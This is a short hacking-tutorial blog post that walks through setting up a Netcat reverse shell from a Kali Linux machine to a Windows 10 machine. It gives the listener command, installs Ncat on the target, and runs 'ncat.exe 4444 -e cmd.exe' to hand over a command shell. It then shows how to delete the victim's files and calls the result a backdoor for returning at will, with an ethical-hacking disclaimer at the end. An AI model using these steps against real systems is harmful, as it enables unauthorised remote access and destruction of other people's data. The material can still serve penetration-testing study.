Connecting from Linux to Windows Reverse Shell

Hacking Truth

Connecting from Linux to Windows Reverse Shell


Hello welcome folks, we are writing a new blog about how to attacker can gain a reverse connection to the windows 10 machine. Reverse connection via we are connecting now in a same private network but you can connect into another another connection. 

A system's backdoor welcome us every time with open hands whenever we knockback. Thus we will try to generate such a similar backdoor over the target's windows machine, which allow us to get in , at any time when we get back. 

Setup Listener

First we setup to a listener over our kali machine

nc -lvp 4444

Connecting from Linux to Windows Reverse Shell

Now we will check our linux's machine IP via ifconfig wlan0 or ifconfig .

Connecting from Linux to Windows Reverse Shell

Before executing any command in windows machine first we need to check netcat installed or not. If netcat is not install in windows machine then install it.

you should install the Netcat (Ncat) package that comes with Nmap, which you can download from

Connecting from Linux to Windows Reverse Shell

After downloading simple right click on setup file and run as administrator after that open cmd prompt and run for check its properly install or not ncat -h

Connecting from Linux to Windows Reverse Shell

now its time to run this command ncat.exe 4444 -e cmd.exe 

Time to get back to our attacker’s machine. From the below image you can see that we are into the victim’s command shell.

Connecting from Linux to Windows Reverse Shell

as you can see that reverse shell have been done and whatever you want you can use windows command line like whoami, del, remove etc

we are doing now simply access those folders and delete anything what i want. But suppose that you entered a wrong command in our attacker's machine so what happened next let see!!
In windows if we want to clear command prompt terminal so for this simply you can use this command cls but for checking purpose we will use clear command.

Connecting from Linux to Windows Reverse Shell

Then if you check in windows machine!!!

Connecting from Linux to Windows Reverse Shell

Yes!! its a correct because of there is no any command line clear so thats why its showing 'clear' is not recognized as a internal or external command ..... so simply clear cmd prompt type cls.

Now we will delete anything what we have to want!!!

Connecting from Linux to Windows Reverse Shell

simply access the directory via cd command.

Connecting from Linux to Windows Reverse Shell

Connecting from Linux to Windows Reverse Shell

use this command for delete the file del filename.

Connecting from Linux to Windows Reverse Shell

 I hope you love this blog don't forget to share the love and happiness with knowledge because by sharing knowledge its increases, it does not decrease.



All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

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